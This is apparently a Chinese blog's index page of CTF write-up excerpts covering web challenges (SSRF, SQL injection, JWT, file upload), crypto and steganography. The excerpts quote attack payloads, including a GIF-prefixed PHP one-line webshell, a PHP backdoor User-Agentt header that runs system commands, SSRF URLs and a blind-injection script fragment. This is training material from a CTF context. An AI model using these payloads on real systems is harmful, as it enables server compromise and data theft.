![](https://img-blog.csdnimg.cn/20201014180756754.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
WriteUp
文章平均质量分 93
Atkxor
小白
展开
-
CTFHub-Web-SSRF练习
这里写自定义目录标题内网访问伪协议读取文件端口扫描POST请求上传文件FastCGI协议内网访问题目描述:尝试访问位于127.0.0.1的flag.php吧访问靶机地址,发现url后面多了/?url=_然后访问127.0.0.1/flag.phpPayload: ?url=127.0.0.1/flag.php伪协议读取文件题目描述:尝试去读取一下Web目录下的flag.php吧在SSRF中常用的伪协议是file:///协议,其在ssrf中可以用来读取php源码。Payload原创 2021-10-18 20:31:53 · 6271 阅读 · 2 评论 -
BUUCTF-MRCTF2020
目录标题Ezpop套娃Ezpop套娃查看源码$query = $_SERVER['QUERY_STRING']; if( substr_count($query, '_') !== 0 || substr_count($query, '%5f') != 0 ){ die('Y0u are So cutE!');} if($_GET['b_u_p_t'] !== '23333' && preg_match('/^23333$/', $_GET['b_u_p_t']))原创 2021-08-08 15:43:19 · 5800 阅读 · 0 评论 -
CTFHub-Web进阶-JWT练习
什么是JWTJWT的结构CTFHub-Web-JWT练习敏感信息泄露什么是JWTJson web token (JWT), 是为了在网络应用环境间传递声明而执行的一种基于JSON的开放标准((RFC7519)。该token被设计为紧凑且安全的,特别适用于分布式站点的单点登录(SSO)场景。JWT的声明一般被用来在身份提供者和服务提供者间传递被认证的用户身份信息,以便于从资源服务器获取资源,也可以增加一些额外的其它业务逻辑所必须的声明信息,该token也可直接被用于认证,也可被加密。JWT的结构.原创 2021-07-25 18:39:05 · 2874 阅读 · 2 评论 -
CTFHub-Web-sql注入练习(二)
布尔盲注Length()函数 返回字符串的长度Substr()截取字符串,有三个参数,第一个是要截取的字符串,第二个是从第几个字符开始,第三个是一次截取多少个字符ascii() 字符的ASCII码值大佬脚本import requestsimport timeurlOPEN = 'http://challenge-b4d99096934b4134.sandbox.ctfhub.com:10080/?id='starOperatorTime = [] mark = 'query_succ原创 2021-07-23 17:49:17 · 430 阅读 · 1 评论 -
ISCC2021 Web WP
目录WebISCC客服冲冲冲(一)这是啥Web01登录which is the true isccMISCRetrieve the passcode海市蜃楼-1WebISCC客服冲冲冲(一)又到了一年一度的ISCC,客服一号为了保住饭碗(被迫)参与了今年的客服海选投票。经过激烈的角逐,客服一号终于凭借着自己多年的客服经验来到决赛的舞台,却发现对手竟是自己???请帮助真正的客服一号在投票中取胜,保住客服一号的饭碗!题目入口:http://39.96.91.106:7020这是啥这是什么东西呢?原创 2021-05-27 20:26:07 · 1779 阅读 · 1 评论 -
ISCC2021 MISC WP
目录MISCMISC1 - Retrieve the passcodeMISC2 - 海市蜃楼-1MISC3 - 我的折扣是多少MISC4 - 区块链MISC5 - Hack the VictimMISC6 - 变异的SM2MISC7- 混乱的音频MISCMISC1 - Retrieve the passcodeScatter说他能解开这个古怪的密码,你呢?来试试吧!Flag格式:ISCC{XXX},XXX为小写字符串,不包括空格xyz.txt1:3:1 1.25:3:1 1.5:3:1原创 2021-05-26 00:06:53 · 3599 阅读 · 1 评论 -
CISCN2021赛后复现
esay_sql输入单引号报错uname=admin&passwd=123456'&Submit=%E7%99%BB%E5%BD%95#You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''123456'') LIMIT 0,1' at line 1sqlma原创 2021-05-21 22:26:42 · 1997 阅读 · 15 评论 -
CTFshow-萌新 Writeup
这里写自定义目录标题萌新_密码1萌新_密码2萌新 密码3萌新 隐写2萌新_密码1密文:53316C6B5A6A42684D3256695A44566A4E47526A4D5459774C5556375A6D49324D32566C4D4449354F4749345A6A526B4F48303D提交格式:KEY{XXXXXXXXXXXXXX}hex转字符串m="53316C6B5A6A42684D3256695A44566A4E47526A4D5459774C5556375A6D49324D3原创 2021-05-06 22:04:35 · 3767 阅读 · 3 评论 -
PNG隐写入门赛
这里写自定义目录标题One PieNG 1One PieNG 2One PieNG 3One PieNG 4One PieNG 5One PieNG 6One PieNGOne PieNGOne PieNGOne PieNGOne PieNGOne PieNGOne PieNGOne PieNG 13One PieNG 1One PieNG 1One PieNG 1One PieNG 1One PieNG 1One PieNG 17One PieNG 18One PieNG 1文件名称One PieN原创 2021-04-23 17:07:39 · 1234 阅读 · 0 评论 -
虎符+红明谷+ctfshow渔人杯赛后复现
目录标题虎符CTFWeb-签到MISC-你会日志分析吗红明谷CTFWeb-write_shellMISC-我的心是冰冰的ctfshow渔人杯签到抽奖感受下气氛神仙姐姐阿拉丁迷飘啊飘简单二维码我跟你拼了虎符CTFWeb-签到参考详细分析PHP源代码后门事件及其供应链安全启示根据文章提示,添加恶意请求头User-Agentt: zerodiumphpinfo();可以看到phpinfo内容继续构造,查看根目录下的文件User-Agentt: zerodiumsystem('ls /');原创 2021-04-05 21:40:02 · 1306 阅读 · 2 评论 -
记两道i春秋欢乐赛题
十二宫的挑衅下载附件,解压,得到Twelve_palaces_of_serial_killers.png图片提取图片内容为,将密文放在excel表格中,第一个字符^,随后再向下移动一格,在向左移动两个,得到第二个字符>,以此类推。经过重新排列,得到新的密文^>%..@3*&#(#0+@#+.@*53)8@+@$+&!%>^&.@36%&&4@?#<!=.*9@=(#=@79@<~)8%=^=0.*/611811)*&g原创 2021-02-09 22:25:13 · 891 阅读 · 0 评论 -
BUUCTF-极客大挑战2019
[极客大挑战2019]Http[极客大挑战2019]upload将里面的内容改为一句话木马GIF89a<script language="php">eval($_POST['shell']);</script> /upload/test.phtml[极客大挑战2019]PHP访问靶机地址提到了备份网站,直接访问www.zip文件,flag.php里面有个假的flag查看一下index.php,发现要用get方式提交参数select再查看class.php原创 2021-01-27 12:09:13 · 675 阅读 · 1 评论 -
2020金盾信安杯wp
CRYPTObase内容:链接: https://pan.baidu.com/s/18oejcVD2ywcSuHo5mqTP1A 密码: hbg4base64转图片扫码得F#S<YReBy{f.WwU{CSv^e^'n*DBase92解码MISC注意数字内容:链接: https://pan.baidu.com/s/14yqufylp_V4iviXUQLm4Nw 密码: k0ji3 9仿射密码小火龙冲啊内容:链接: https://pan.baidu.com/s/1_Te原创 2020-12-22 22:06:57 · 1310 阅读 · 1 评论 -
极客大挑战2020wp
Crypto二战情报员刘壮简介:你能知道刘壮在说什么?得到的flag包裹上SYC{} .-…/.----/…-/–…/…/…-/…-/-./–./…–.-/…/…–.-/–…/.----/-.–/.----提示:刘壮早上起床打摩丝提交flag,发现错误,转换成小写还是不对,查看了一下群里给的hint,成功提交铠甲与萨满简介:YEI{roafnagtmroafnagtm_hgtmhgtmhgtm}提示:kaisa?偏移量为6时,得到flagMISC一“页”障目作者:lingze简原创 2020-11-29 23:14:06 · 1052 阅读 · 0 评论 -
ISCC2020部分wp
1. LSB下载压缩包,解压得到一个图片用Stegsolve打开,进行异或在通道为0时发现了异常将所有通道设为0,然后保存为flag.png打开图片,发现是二维码扫描后得到cumtctf{1sb_i4_s0_Ea4y}2.原创 2020-07-10 15:38:25 · 827 阅读 · 0 评论